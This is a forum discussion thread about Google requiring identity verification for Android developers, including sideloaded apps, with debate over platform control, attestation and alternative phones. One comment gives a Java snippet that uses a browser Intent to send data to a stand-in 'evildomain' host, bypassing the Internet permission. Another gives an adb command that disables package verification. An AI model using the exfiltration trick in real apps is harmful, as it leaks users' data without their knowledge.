> Google will begin to verify the identities of developers distributing their apps on Android devices, not just those who distribute via the Play Store
This is absolutely unacceptable. That's like you having to submit your personal details to Microsoft in order to just run a program on Windows. Absolutely nuts and it will not go as they think it will.
To meaningfully challenge it, developers need to agree to withheld supply like a cartel (illegal?) or union.
I think it’s probably close to the union scenario in an industry with a single employer, as there is that one too many relation (developers vs employer). Whereas a cartel is a few suppliers conspiring against all consumers.
I’m not sure developers would go to those lengths, and I’m not sure it would work either as the benefit is too high from defecting from such a coalition.
I predict Windows will end up going this route before Google backtracks on it.
This is the future; partially fuelled by malware, partially fuelled by the desire for platform control, and partially fuelled by government regulation.
Microsoft mismanaged it but there was a potential parallel universe where they were successful at that plan and consumer versions of Windows would be locked to the Microsoft store.
They did a bunch of terrible inept rollouts with confusing technology for both users and developers and effectively shot themselves in the foot. But it did not have to go down that way.
Yep. They fumbled the ball on step 1 of demand aggregation and we got lucky there was nothing of value for the 99% of users that will blindly take the easy path.
> Microsoft has way too much of legacy software people use, banning it all overnight will not go well at all.
A lot of legacy software was killed off with the move to 64-bit Windows. Consumers survived that and for businesses registering their software with MS isn't a problem. They're already handing Microsoft all of their company email, their documents, their spreadsheets, etc. and paying Microsoft for the privilege. MS doesn't care at all about consumers.
They can just require hash of legacy binaries sent to Microsoft and rubberstamped back. Eventually they'll have a near comprehensive list of legacy binaries in common use, and move to block unknown binaries in circulation as "malware".
The malware excuse is just a palatable false pretense. "We have to protect granny!" Of course, she is getting fleeced by plain scam calls, not somehow sideloading apks onto her idevice, but the truth doesn't help advance their narrative.
Malware is the excuse. Control is the goal. Extracting as much money from people while providing less actual value.
The saddest part is this is to the detriment of literally everyone except a couple rich owners of those companies. And everyone has the right to vote. But western democracy is so indirect the people who understand and care have no way to change the law because their signal is lost in all the noise by those who don't know or don't care.
If the vote came down to people in favor of walled gardens or in favor of forcing companies to open their platforms, with everyone else not voting, it would be a landslide. But there's no way to vote on it this way.
This is a monopoly with annual gross revenues bigger than all but 42 countries behaving this way.
They have conspired to control the web, browsers, mobile computing, and soon AI. It's sickening how much bad behavior they get away with.
They were able to use YouTube to bludgeon Windows Phone to death and become the de-facto mobile duopoly. Then they were able to get their shitty search engine on all the panes of glass, didn't care one iota about search quality (just ads), but were able to leverage their browser engine control to remove adblocking capabilities.
I hope the DOJ/FTC split Google into a dozen companies.
I never really got into "phone" progrmaming, always waiting for the shenanigans to die down. But somehow the shanigans have gotten worse and for a significant chunk of the world population, the phone is the only computation device they have at all.
I never got into it because I was convinced developers would refuse to give up control over distribution when Apple started doing it. I wish I was right, but here we are.
Developers sometimes seem to be as in control as farmers are of the distribution of their produce. There's no absolute rule that gives the owners of large scale distribution networks power over both producer and consumer. It's just laws of convenience. It's easier for everyone to go through a few or just a single common broker.
There's no law against a more democratic way to implement the broker either but it requires interesting methods of coordination and/or decision making that doesn't seem to exist yet?
It limits choice. I don’t have any experience building mobile apps because I didn’t want to buy into an unfair ecosystem. That means fewer mobile apps even if distribution networks change tomorrow.
i made and released some apps in the early days. Got tired of it and got tired of the reminders from google to add banners, screenshots, submitting icons to support multiple resolutions.. notifications that apps i haven't touched in decade are no longer compatible etc.
so much extra work involved that isn't building the app.
They have the ecosystem by the balls. Phone manufacturers in recent years have been making unlocking & modifying their devices more and more difficult, google and app developers have been cracking down harder on modded devices by implementing TPM equivalents in the hardware to sign and verify that your system is a google-appproved one, and alternatives still are decades behind in terms of app ecosystem.
> and alternatives still are decades behind in terms of app ecosystem.
That's if they're available at all. In my country, only cell phones certified by the telecommunications government agency (ANATEL) can be imported, so the alternatives (Jolla, PinePhone, Fairphone) simply don't exist.
It's incredibly obnoxious when people type "in my country" as if we're all supposed to just... know where they live. It's also incredibly common. Why do people do this?
Yeah, I'll just ditch Google over this. The only reason I put up with their crap is because I can actually just install software on my phone. If they take that away, there's no motivation to stay.
I would say this is a bold choice for a company whose existing restrictions around third party apps and stores and in-app purchases has already been found illegal. While it doesn't look like they're pushing for it right now, forcing Google to sell Android was something the DOJ has considered as a penalty.
I'm not sure Google still has the ecosystem by the balls. It's very possible whatever Googlers who made this decision are the type of folks who don't comprehend they work for a monopoly that like actually can't do things like this anymore.
They're also the best equipped to tell if you've done so, and restrict access from critical functionality needed by many in their day-to-day lives if you've done so.
The intentions behind all the security hardware they introduced in pixel phones first, and is now required by play integrity to function might've been well-meaning, but that doesn't really matter in the end. Security features that the user can't control and bypass aren't security features - they're digital handcuffs.
true, and recently they deserved a lot of credit for publicly releasing their device trees and drivers. unfortunately, with the 10 series pixels they no longer will be releasing device trees, which makes it much more difficult to maintain custom ROMs
This is the same direction that Microsoft is taking Windows. Smart App Control is already rolling out to some regions - no .exe will run without a code signing certificate.
They did it the right way for a very long time and yet people keep buying iPhones, I think I would do the same if I were them, users clearly don't seem to care about openness and freedom to use their devices however they want. I mean, people care about the color of archaic text messages. There is nothing to save.
This is how macOS works, without a signature they will tell you they can't guarantee it doesn't have malware and you need to go to settings and choose to run anyway (and most people don't even know about it).
Microsoft would love to do that too, but it just has too much of legacy software to introduce such a major hurdle.
> This is how macOS works, without a signature they will tell you they can't guarantee it doesn't have malware
Even with a signature they can't guarantee it doesn't have malware. The fact that signed malware exists should be enough to put an end to the argument that it's for our own good.
Ah, then it would be acceptable if an independent third party who does not share data with Google other than Boolean yes/no was used to do this. I expect that’s their long-term plan anyways, to defuse the predictable backlash and externalize the problem and liabilities altogether, once the initial ID harvesting is done.
Never heard of DUNS. It seems to be a US company *Dun & Bradstreet) that provides business intelligence.
It seems kind of odd to me to rely on some kind of external hidden "credit agency"-style company for this? And why would DUNS want to know about some kid in their basement in Bangledesh making (non-malicious) apps, and why would the kid want Dun & Bradstreet to know about them? It makes no sense at all.
They're trying to control malware. Tying apps that may be malicious to an identity that takes some degree of cost and effort to establish seems sensible in that light.
It's not that the identity prevents malware/abuse, but publishing any malware to the store burns the identity and establishing another is harder than simply coming up with a new email address. It's not necessarily the best scheme out of there, but it makes sense given their apparent goal.
Yeah, basically this is the rise of computer-credit agencies.
Youc an see the zeitgeist forming around corporations wanting to lock out any small unlicensed company from working on phones.
The key is mostly fascism in the guise of "security". Witness stuff like the ICE tracker app. Google would love a way to freeze out both it's appearance on the app store and any developer who'd program similar.
For me the difference is that Android is an open-source operating system. It sold itself and differentiated itself to users, developers and phone manufacturers as an open ecosystem built on open-source foundations.
Over the years, it seems Google has been trying to have their cake and eat it too, by basically subsuming others to use Android through this appeal of a more free and open operating system ecosystem, but have tried to slowly close and close it down now that it has won the other half of the market on that promise.
This feels more sly, because it's kind of a bait and switch. Apple never made such claim and was always upfront, so while I don't like it, I never bought into it in the first place for them to have the rug pulled under me after giving them my money as Google might be doing.
Governments are scurred the internet has made everyone realize their governments are crap, their history is gibberish, and it's all being used to screw the next generation. So 60+ year olds are falling back on old tropes
TikTok is "brain rot" even though the real economy runs on physical statistics, the semantics have to be recognizable to the elders, or it's not democratic so they will force the semantics to be regurgitated as-if they are religious catechism.
It's easy. For the average user, device integrity is more valuable (by a lot) than side loading.
People that think this is unacceptable are not remotely average users. Average users benefit greatly from their pocket appliance not being a full fledged computer.
Ultimate control over devices you own should be a basic right. Apple's wanton abuse of users and developers via the control they have over their platform, and Google's nipping at their heels, should be evidence enough of that.
Fundamentally, it is a trust issue. Why should I be forced to trust Google or Apple has my best interests in mind (they don't)? That is not ensuring 'device integrity', it's ensuring that I am at the whims of a corporation which doesn't care about me and will leverage what it can to extract as much blood as it can from me. You can ensure 'device integrity' without putting any permanent trust in Google or Apple.
That was intended to be a generic 'device manufacturer', not calling out Google and Apple specifically. It's my device. I should control it, full stop. It should simply not be legal for a device manufacturer to lock me out of a device I own, post sale. In the past it wasn't _possible_, so we didn't need to worry about it. But now the tech is at the point where manufacturers can create digital locks which simply cannot be broken, and give them full control of devices they sell (ie. which they no longer own), which are being used in anti-consumer ways.
Considering market forces are against it, I believe the only practical way to accomplish this in the long term is for this to be a right that is enforced by legislation. I don't think it is even far from precedent surrounding first sale doctrine and things like Magnuson-Moss, that the user should be the ultimate one in control post-purchase, it just takes a different shape when we're talking about computing technology.
Modern life without either of these OS (or like a phone number) is pretty difficult, i.e. you can't charge your car or access e-government without an app.
Id argue that the average user is not a good barometer. They are okay with slowly being boiled alive. See windows 11 as a good example.
What's being sacrificed in the name of security is not worth it imo.
Enabling side loading on android is not a standard setting you can flick on. Is there any data on the number of devices who have this enabled and are falling for hacked apps?
I might partially agree, but the market already has a fantastic, secure option for those users: Apple.
Android's value was always in being the open(ish) alternative. When we lose that choice and the whole world adopts one philosophy, the ecosystem becomes brittle.
We saw this with the Bell monopoly, which held up telephone innovation for three quarters of a century.
In the short term, some users are safer. In the medium term, all users suffer from the lack of competition and innovation that a duopoly of walled gardens will create.
They're happy in their walled garden, until they don't and discover there is a wall they now can't overcome and learn whose hardware it really is
I do think it is in everyone's interest to be able to run software of your choosing on hardware you bought to own. The manufacturer needn't make it easy (my microwave sure didn't expect to install extra software packages; I don't expect them to open up an interface for this) but they also don't need to actively block the device owner from doing it
And people who are financially interested in letting users side-load apps (malicious or otherwise) are good at what they do. I mean, even Russian banks that are banned from the Apple App Store are still finding ways to distribute iPhone apps.
> Average users benefit greatly from their pocket appliance not being a full fledged computer.
Why, though?
There's certainly no technical reason that a pocket appliance can't be a full fledged computer. The primary reason it isn't is because device manufacturers benefit greatly from having a tight control over their products. This is not unique to mobile devices; we see the same trend of desktop operating systems becoming increasingly user hostile as well.
The claim that these features are in the best interest of users is an inane excuse. Operating systems can certainly give users the freedom to use their devices to their full capabilities, without sacrificing their security or privacy. There are many ways that Google could implement this that doesn't involve being the global authority over which apps users are allowed to install. But, of course, they are in the advertising business, where all data that can be collected, must be collected.
Don't pretend that average users are asked, or that their opinions would matter. Or even that you have some sort of insight into the average user that other people don't have.
People who think this is unacceptable are the people who 1) understand what it is, 2) don't stand to profit from it, and 3) don't dream about locking average users into an ecosystem that they control some day.
Why would it not go as they think it will? The big guy always wins against the little guy. The fact they make this move suggest they know it is a sure bet.
So long as they don't make it very hard to get an ID approval, I don't see why people shouldn't know who developed an app.
Currently the entire ecosystem is riddled with malware, spyware, or adware with shady source information and people have no way to verify the data practices
"You may also need to upload official government ID."
This won't end well for Google or the governments involved when the people get so angry that they are forced to roll this back. Switch to an alternative phone OS.
> This won't end well for Google or the governments involved when the people get so angry
The amount of people this makes angry is so minuscule that it probably wouldn’t even pass one of those theatrical “sign this petition to get the government to discuss it” thingy. Mind you, the only reason the whole side-loading court cases were going forward is because a giganormous company (Epic) wanted to make more money instead of paying the Google/Apple tax. Not because some people were angry.
There are two OS platforms for desktop/laptop usage:
MacOS
Windows
These both contain ways to run arbitrary compiled code from an arbitrary source -- like a computer should. Losing this feature of our smartphones should have everyone concerned.
Right. The OP's point was that just having 2 major OSes is the problem but it's clearly not because we had that situation with desktops/laptops and they both allow arbitrary code.
Attestation & Play Integrity is having a good go at blocking this: lots of critical software (e.g. the app required to use your bank account) requires certified attested devices, and Google are pushing hard to get as many apps as possible to activate that for "security", making non-Google Android un fixably 2nd tier in functionality.
Doesn't GNU/Linux also have this problem with e.g. Netflix? If you don't pass their spyware, you get shitty streams from video apps and no access to financial accounts.
Most vendors, including the big ones, don't play well with that. Google just revoked open sourcing the Pixel as the reference design which was the strongest option for that. Things like newer Samsungs are black boxes and everyone is actively making it harder to do anything with devices you bought and paid for.
The number of people able to do that is fewer than those willing to send in copies of overnment IDs. Phones compatible with AOSP builds are rare outside small bubbles of Pixel users as well.
> the people get so angry that they are forced to roll this back.
This is political fantasy. There is no mechanism for "the people" to force anyone to roll this back. They can vote for the candidate owned by google, or the candidate owned by google. If they want to find another candidate, they'll have to use google to find one.
They will just get sacked for sycophants either here or abroad. For every principled worker there is, there is another person willing to eschew those principles for that paycheck. This is a desperate world by design to enable these tradeoffs by the very people who build, maintain, deploy, and ultimately control the worlds systems.
Anyone even remotely privacy or security conscious needs to vote with their wallet in protest and stop buying Android phones, otherwise it's only a matter of time 'til Google bans side-loading and it becomes impossible to buy a phone that can run any kind of anonymous or end-to-end encrypted communication software.
Stop buying Android and what? Buy an iPhone that's even more locked down or live like an outcast that can't access essential services? Because those are the realistic options.
For years I've been buying middle-of-the-road Android phones because they provide pretty good bang for the buck, but if I can't use a computer I paid for however the fuck I want, I'm just going to start getting the cheapest crap I can get away with and use it as little as possible. "Vote with your wallet" doesn't have to mean total abstinence.
Flip phones can access essential services just fine, if some business or government office is only allowing something to be done via smartphone app, that’s a problem.
in all things. I would encourage you and everyone who reads this post to stare down this option with realistic consideration. In a society this broken, it is the solution to more and more things. To checkout, to accept the hard mode because to pick the path of convenience is to be exploited.
I respect at least your choice but I'm not growing tofu on the farm. Veganism is one of those protests that while i appreciate going after factory farms, you're only enabled to do so by large corporations.
In your country, maybe. Over here you're dead in the water without a smartphone — can't access banking except by going to the branch and standing in the queue for an hour or two, can't access most government services. Limit your selection of goods (like electronics, but not only that) by something like 90% (and also increase prices by 30-50%) because brick and mortar shops sell old crap at much higher cost than it was ever worth, and the only real solution is buying from a major marketplace which is only available as a mobile application.
This concept originated in China and is spreading. Beware.
@achrono (I cannot reply to the other post, I don't know why). Yes, you can use just a web browser.
> Mobile Payments
They work with a card, no smartphone required. Moreover, cash didn't cease to exist.
> Navigation
Again, physical maps are a thing. Google Maps or OpenStreetMap are accessible by browser. Having a physical map and having to follow road signs can be a beautiful experience. If one is addicted to a machine that tells them where to go, navigators are still a thing (no smartphone required)
>All manner of IoT devices
Don't put an IoT device in your house if you don't know what it does and how it works. If the only way to interface to it is via an app... then you don't know what it does and how it works. Don't put it in your house.
>Wearables
I don't even know what are wearables: if I write it on Firefox it underlines it in red. By doing a quick search, I can see images of watches. Watches can work without an app. Moreover, watches that work without an app are usually less expensive than the other kind.
>Digital versions of ID (Mobile Passport Control)
Don't. I know that some governments are pushing this crap thinking it's the future. Simply don't. Imagine you're at the airport and you accidentally drop your passport. You pick it up, nothing lost. Imagine you drop your phone and it stops working. You lost:
- Your documents
- Your money (if you rely on your phone for paying and don't have cash with you, which seems a growing trend among people I know)
- All your ways to contact people for help
Instead:
- Your wallet is stolen: you lost all your money and your cards, but you have your documents (at least the passport because it surely does not fit a wallet).
- Your phone is stolen: you lost all the ways to contact people, but you can buy another one
- Your passport is stolen: you can contact your embassy.
Smartphones are becoming a SPOF (Single Point Of Failure) for our lives.
Are you for real? I'm totally on board with using free and open alternatives, but if you're not going on a mountain trail then a physical map is going to be drastically worse than any navigation software.
Also FWIW I have a card-sized passport that I can easily get stolen with my wallet.
But, and I hesitate to point it out, because I am finding that people think it is somehow minimal entry stakes, one does not need any of those things..
You wouldn't get very far without WeChat and AliPay in China. Last time a good friend of mine was there, many merchants simply refused to accept cash. The few that did had made it known how much they were inconvenienced by doing that.
Same for basically every interaction with locals, for accessing government services, or even just using the public transportation.
It's pretty similar for locals AFAIK.
And before anyone replies that he didn't have to travel there — no, he did, unless he was willing to look for another job (which are very sparse here, you hold on to a good job for dear life).
Buy Apple; the point is to hurt Google. If enough people do it, Google might reconsider. Show them that the open ecosystem is the only value Android added, and if they refuse to bring back the open ecosystem then their platform will slowly die. Won't be long until Google's as locked-down as Apple at this rate, so all Android gives you is a power-hungry OS that protect your privacy even less than iOS does.
Buying closed stuff to show we want an open ecosystem?
At this point, I believe the most effective ways one can help with this is:
(1) advocacy - it's slow and difficult, but having people at least agree / be familiar with the idea that closed stuff is bad is a good first step.
Open ecosystems can't work for the general public if it's trapped in closed networks that won't work on anything else than the two big mobile operating systems, so making people start using open chat apps and such will help a lot. It'll take years, but so be it. It's worth it I think.
(2) helping improve the more open stuff.
I think Linux mobile for instance is a potentially viable alternative in the medium term for at least the basic use cases: Calls, SMS, GPS / Maps, Signal, photos. All this has no reason not to work with some polish. I daily drove Linux mobile 4 years ago for a year. The main thing I'm missing is good hardware for it, and a lot of polish but nothing impossible. Yeah, indeed, no payment with the phone (Google Pay / Apple Pay). But it's still possible to use the physical cards and not use the phone for this.
You've got to be kidding. Doesn't work, Apple is even more locked down than what this article announces. No sideloading whatsoever, signature checks ala Play Protect are mandatory and cannot be switched off, no alternative app stores, etc.
Not sure why this is downvoted. The entire value proposition of Android is the semi-open OS. For things you can’t do with Apple devices, you use the myriad of Android devices out there.
Yet most of the world runs Android. Its main value proposition was always wide selection of hardware for however much money you're willing to spend, not its relative openness.
I make relatively decent money by our standards, and I wouldn't even think about dropping $700-1000 on a phone (which isn't even officially sold or supported over here). For the vast majority of people it's their whole income over 2-4 months. I don't know or care how much you make, let's say it's $10k per month. Imagine if you had to pay $20-40k for a phone which is good for maybe 5-8 years.
I'm curious if GrapheneOS or other custom Android builds would be able to avoid these restrictions reasonably.
Obviously this is going to impact the supply of apps, since the market share of custom Android is smaller than even the market share of people willing to sideload or use an alternative store on a mainstream Android phone. Many developers might quit the game.
The problem with custom ROMs is that many government, banking, and similar apps don't run on them without workarounds. Some of those apps also consider this as a TOS violation as well.
When Microsoft first proposed a remote attestation scheme for PCs under the name Palladium, it was widely seen as a nightmare scenario. Even the mainstream press was critical[0]. There was barely a whimper when Google introduced Safetynet a decade later.
It wasn't OK in 2003. It wasn't OK in 2014. It isn't OK now. I'm just not sure what anybody can do about it.
What changed is that the vast majority of users in 2025 are retarded normies that have never even considered trying to understand how their pocket computers work. And now that they are the majority, the voice of people that have even a remote understanding of how any of this works get drowned in the noise of social media divisiveness. Divide and Conquer. Oldest play in the book.
I don’t use any utility apps (identity, banking, services etc) on my phone and stick to the desktop web. And don’t use services that do require me to have a Google or apple account and phone. (Spoiler: I do)
I hope my tiny datapoint shows up in some aggregated stats somewhere.
Then I won't run those apps. Seriously. I know not everyone has this option, but it's been my experience that a lot of processes do in fact have workarounds when you show them the cryptic error their poorly behaved app throws.
GrapheneOS is a beautiful stop-gap, but there are real bona-fide Linux smartphones out there. To be clear, there are not many, the hardware often isn't great, the software often isn't great. PinePhone and Librem come to mind.
Cell carriers will just start requiring the attestation as well. And eventually, even an internet connection will - wifi routers will have to attest to ISP equipment, etc.
The final phase is "AI" monitoring everything you do on your devices. Eventually it won't just be passive, either, but likely active: able to change books you read and audio you listen to on-the-fly without your consent. It will be argued that this ok because the program is "objective".
I've been keeping an eye on FuriLabs (Furiphone). They maintain FuriOS - Debian with an Android kernel. Has a container for running Android apps. Price is reasonable though I don't know how it'll be affected by tariffs in the US. It's tempting.
The alternative is just Apple; if Google loses enough users they might reconsider. Essentially the only real advantage Android had over Apple was being a more free platform/ecosystem; if they're going to do away with that, then they should be shown that this means they'll lose a lot of users.
I've grown increasingly hateful towards both my Android and iOS devices over the last decade. The platforms themselves are increasingly user-hostile, and their appstores are crammed full of shitty, privacy-invading, telemetry-hoovering, dopamine-triggering, ad-filled, lipstick-covered apps that are often garbage compared to the pioneering days of mobile. I miss the days of my old Palm Pilot.
Is anyone working on fixing this? We can do so much better.
Vollo from German is one https://volla.online/. They sell a nice set of devices that run either a custom Android or Ubuntu Touch. Their custom Android has a nice bunch of UI and privacy features.
Another one is https://murena.com/ which (IIRC) is based in France. They don't have their own hardware though, they sell partner phones with their ROM preinstalled.
For once Fairphone never updating their phones will work in our favor! If Google roll sthis out in early 2026, anyone with a Fairphone can rest easy that they won't receive that version of the operating system until mid-2028 at least.
Side note, I read that GrapheneOS project is having some challenges recently.. between [0]the Android kernel drivers no longer having their Git history of changes being released (only a code dump with no history) - and [1]one of Graphene's two core contributors being detained/conscripted into a war.
How do you access banking and other sensitive apps? If the answer is, you don't, well, you can see how that's a non starter for the vast majority of people.
This is quickly disappearing as an option as well. I need my bank app to authenticate even when using a web browser on desktop. Luckily my banks app still works on GrapheneOS, but I suspect it's only a matter of time before they disable that because of "security" reasons.
They don't all work, though: too many crank up the settings on google's various 'integrity' checks and will fail on anything that isn't 100% google-blessed. (Which is insane, because that's all that's required: on a previous phone of mine, it worked fine with a stock ROM with a bluetooth-based RCE, but upgrading to a custom ROM would have meant it was 'insecure')
My credit union app already wants 24x7 GPS tracking of my location and full access to my camera at all times and full access to my collection of photos, so the app is already dead to me anyway. Demanding that I use it on a locked down device isn't going to change anything for me, I'm already actively not using it. I use the website on a desktop, I rarely need to access my CU at all much less access it remotely.
Given the large amount of battery and bandwidth already used to track my every move, I wish there was something like "Docker for phones" where I could enable and disable 24x7 full access to my every action IRL.
The entire developer experience was fantastic and the thing that killed it was a lack of desire from the upper leadership when it felt like they couldn't compete with the duopoly.
Did you have a wince app? Too bad, throw away all that and rebuild for wp7.
Do you want do anything useful? Actually, you better wait for wp7.5.
Oh look, we have a totally new thing with WP8. Upgrade to the newest framework so you can use the WP8 features... Oh, but you still need to build for the old framework for WP7. Hey, how about WP8.1, kind of the same deal.
My personal favorite though was WM10; you now need to build a Universal app that only runs on the very small number of WM10 phones... If you want to run on WP7 and WP8 which still have more sales, a universal app doesn't run there. Also, even though we said WP8 phones would be able to upgrade, either we changed our mind, or the experience is so bad most people won't. And the cherry on top... Users who upgrade from 8 to 10 might need to delete and reinstall the app, otherwise it will just show the loading dots.
Did we mention, we decided we didn't need engineers in Test in the run up to WM10? Couldn't possibly be why the release was terrible.
> developers will have the same freedom to distribute their apps directly to users through sideloading or to use any app store they prefer. We believe this is how an open system should work—by preserving choice while enhancing security for everyone
I guess words don't don't have meaning anymore, how can you claim to have an open system in an announcement about closing it down?
It's also telling that the big supporters of this are apparently corporations and governments. Admittedly I don't know what "Developer's Alliance" is but they don't seem to care about developers very much, and I wouldn't surprised if they were just a "pay us to say what you're doing is good for devs" kind of thing
The Developer's Alliance address is a coworking space in Washington DC, if you want to rate the likelihood it's just an astroturf for public tech policy wonks.
Even aside from the privacy implications (which aren't trivial themselves,)
Doesn't this make it prohibitively difficult to do local builds of open source projects? It's been a long time since I've done this, but my recollection was that the process to do this was essentially you would build someone else's (the project's) package/namespace up through signing, but sign it locally with your own dev keys. A glance at the docs they've shared makes it sound like the package name essentially gets bound to an identity and you then can't sign it with another key. Am a I misremembering and/or has something changed in this process? Am I missing something?
A repo is just files in a directory, so the namespace can be changed, but the whole thing stinks. Having to setup Android signing keys and needing to provide ID is not fun.
It means you won't easily be able to run builds on Google certified Android devices that aren't from "approved" people.
That's where the "prohibitively difficult" part comes in... surely they don't expect every developer on every open source app in the world to have their own app registration/package name for the same app, do they? Feels like an N * M problem, if so.
The article didn't say much about the account approval process, but from the looks of it Google will be able to arbitrarily accept and revoke applications as they see fit. So much for an open platform, bring forth the gatekeeping!
Personally I would be fine with unsigned apps requiring the user to click through a notice before install, or having a setting to toggle to enable unsigned apps. Windows does something similar to this where unsigned binaries get a pop up warning but signed ones are executed immediately.
Actually my bank already requires me to use the phone app for any operation on the website. When I want to login from my laptop I need to use my phone with their app to approve the login, same for almost any operation.
Ah, and it can only be installed in one device at the same time :D Don't have your phone available? Bad luck for you
For what conceivable reason would they make the users go on desktop, considering mobile is in the process of being fully locked down?
If anything, they'd eventually deny access from desktop, forcing everyone to login via the fully manages mobile devices without any user freedom.
Some banks are already getting there btw, as their preferred 2fa is a companion app... One small step away from making that the only option, effectively denying access to anyone without a locked down mobile device.
De facto, this is already the case - you can use your computer as a display but to actually authorize a login or transaction you need your phone with said attestation.
True for PayPal though. I just recently had to jump through seven different hoops to verify my ID (with creepy, creepy face scans) and they absolutely refused to even start the process on desktop. Eventually got the stupid thing to work on my iPad; Android+Firefox was a no go, and it's stock Pixel 5a with Google OS.
Thankfully I don't actually rely on PayPal for anything serious, but there are artists whose commission I like to pay, and being able to actually pay them would be nice. :/
I'll just have to disable it and choose a banking app that works on the browser. Tonnes of my apps are sideloaded. Quite a few are on the playstore or the dev might upload their details.
Personally...we all know the Play Store is chock full of malicious garbage, so the verification requirements there don't do jack to protect users. The way I see it, this is nothing but a power grab, a way for Google to kill apps like Revanced for good. They'll just find some bullshit reason to suspend your developer account if you do something they don't like.
Every time I hear mentions of "safety" from the folks at Google, I'm reminded that there's a hidden Internet permission on Android that can neuter 95% of malicious apps. But it's hidden, apparently because keeping users from using it to block ads on apps is of greater concern to Google than keeping people safe.
> we will be confirming who the developer is, not reviewing the content of their app or where it came from
This is such an odd statement. I mean, surely they have to be willing to review the contents of apps at some point (if only to suspend the accounts of developers who are actually producing malware), or else this whole affair does nothing but introduce friction.
TFA had me believing that bypassing the restriction might've been possible by disabling Play Protect, but that doesn't seem to be the case since there aren't any mentions of it in the official info we've been given.
On the flip side, that's one less platform I care about supporting with my projects. We're down to just Linux and Windows if you're not willing to sell your soul (no, I will not be making a Google account) just for the right to develop for a certain platform.
> Every time I hear mentions of "safety" from the folks at Google, I'm reminded that there's a hidden Internet permission on Android that can neuter 95% of malicious apps. But it's hidden, apparently because keeping users from using it to block ads on apps is of greater concern to Google than keeping people safe.
You've never needed the internet permission to exfiltrate data. Just send an intent to the browser app to load a page owned by the attacker with the data to be exfilled in the query parameters.
> had me believing that bypassing the restriction might've been possible by disabling Play Protect, but that doesn't seem to be the case since there aren't any mentions of it in the official info we've been given.
I don't think we can know for sure before the change is actually in place. Going through Play Protect would certainly be the easiest way of implementing this - it would be a simple change from "Play Protect rejects known malware" to "Play Protect rejects any app that isn't properly notarized". This would narrowly address the issue where the existing malware checks are made ineffective by pushing some new variant of the malicious app with a different package id.
It's a big change for the ecosystem nonetheless because it will require all existing developers to register for verification if they want to publish a "legit" app that won't be rejected by any common Android device - and the phrasing of the official announcements accurately reflects this. But this says nothing much as of yet about whether power users will be allowed to proactively disable these checks (just like they can turn off Play Protect today, even though very few people do so in practice).
<< we will be confirming who the developer is, not reviewing the content of their app or where it came from
To be honest, it almost makes me wonder if the issue here is not related to security at all. I am not being sarcastic. What I mean is, maybe the issue revolves around some of the issue MS had with github ( sanctions and KYC checks ).
> This is such an odd statement. I mean, surely they have to be willing to review the contents of apps at some point (if only to suspend the accounts of developers who are actually producing malware), or else this whole affair does nothing but introduce friction.
Requiring company verification helps against some app pretending to be made by a legitimate institution, e.g. your bank.
Requiring public key registration for package name protects against package modification with malware. Typical issue - I want to download an app that's not on available "in my country" - because I'm on a holiday and want to try some local app, but my "play store country" is tied to my credit card and the developer only made it available in his own country thinking it would be useless for foreigners. I usually try to download it from APKMirror. APKMirror tries to do signature verification. But I may not find it on APKMirror but only on some sketchy site. The sketchy site may not do any signature verification so I can't be sure that I downloaded an original unmodified APK instead of the original APK injected with some malware.
Both of these can be done without actually scanning the package contents. They are essentially just equivalents of EV SSL certificates and DANE/TLSA from TLS world.
Google also used to show you which apps used Internet permission in Play Store. But they removed it, which makes it harder to notice which apps don't use it.
Google mostly doesn't let you deny permissions while running apps that require them; recently there's some permissions that you can pick at runtime. So it's not suprising that they don't let you deny this one, when they don't even show it in the store.
> But it's hidden, apparently because keeping users from using it to block ads on apps is of greater concern to Google than keeping people safe.
The internet permission has nothing to do with ads? It's a hidden permission because:
1) Internet connection is so ubiquitous as to just be noise if displayed
2) It's not robust, apps without Internet permission can still exfiltrate data relatively easily by bouncing off of other apps using Intents and similar
It absolutely has to do with ads. While there are various ways to exfiltrate small amounts of data, the non-collaborative ones are rarely silent and most importantly, they won't let the app get responses (e.g. ads) back.
The main thing this permission would be used for would be blocking ads. Also distinguishing shitty apps that are full of ads from those that aren't. If there is a calculator that needs Internet and one that doesn't, which one are you going to use?
> 1) Internet connection is so ubiquitous as to just be noise if displayed
That doesn't make it any less useful.
> 2) It's not robust, apps without Internet permission can still exfiltrate data relatively easily by bouncing off of other apps using Intents and similar
I've heard claims that the Internet permission is flawed, yes, but I've never managed to find even a single PoC bypassing it. But even if it is flawed, don't you think Google would be a bit more incentivized to make the Internet permission work as expected if people could disable it?
> I've heard claims that the Internet permission is flawed, yes, but I've never managed to find even a single PoC bypassing it.
Uri uri = Uri.parse("https://evildomain.com/upload?data=DATA_GOES_HERE);
Intent i = new Intent(Intent.ACTION_VIEW, uri);
startActivity(i);
Happily uses the browser app to do the data send for you. Requiring apps to have all the permissions of the recipient of an Intent before being allowed to send it would be a catastrophic change to the ecosystem.
I mean, I just did a quick look over the installed apps on this phone and ~1/4 of them would work perfectly well without an internet connection, things like a level or GPS speedometer that use the phone sensor or apps for Bluetooth control of devices [like 0] . Why would something like a bubble level app need internet access for anything besides telemetry or ads? I realize I have way more of these types of apps than the average user, but apps like this aren't a super-niche thing that would be on 0.1% of devices.
I just tend to give Google little benefit of the doubt here, considering where their revenue comes from. Same as when they introduced manifest v3, ostensibly for security but just conveniently happening to neuter adblocking. Disabling access to the internet permission for apps aligns with their profit motive.
It will be interesting to see how they handle packages from the various f-droid repos. F-droid builds and signs all their apps themselves, so will all of f-droid be covered by a single signing key and developer account? Or will the fact that they take apps from lots of folks bar them from an account?
F-Droid generates a unique key for each app and that key is then reused for all builds of that app. This will probably just require registering the F-Droid public key to the package name with Google.
Unless I misunderstood the question, this is covered in TFA
> The tech giant stresses that this does not mean developers can’t distribute outside of the Play Store through other app stores or via sideloading — Android will remain open in that regard.
You have misunderstood the question, or perhaps buried the lede. 'Open in that regard' is tantamount to not open at all. If you gatekeep being able to load an app to an Android phone behind these processes, you're essentially stuck with no recourse if you, say, have a banned google account, or have some reason you don't wish to send your government ID to these companies.
It also makes sure you only get one ID for life. There’s no creating a second account if you get banned because they’ll (likely at some point) collect biometric data as part of the verification process.
These big companies need to be broken into a thousand pieces. They’re starting to become the gatekeepers of participating in society.
>The Play Store implemented similar requirements in 2023, but Google is now mandating this for all install methods, including third-party app stores and sideloading where you download an APK file from a third-party source.
Your own quote shows the source of the confusion. OC was asking how will google handle apps that have somebody else signing for them. Your quote talks about letting devs that go through a verification process still side load (though that has no real benefit at that point since google still holds control over you)
If this is enforced via Play Protect, then the whole mechanism can likely be disabled with:
adb shell settings put global package_verifier_user_consent -1
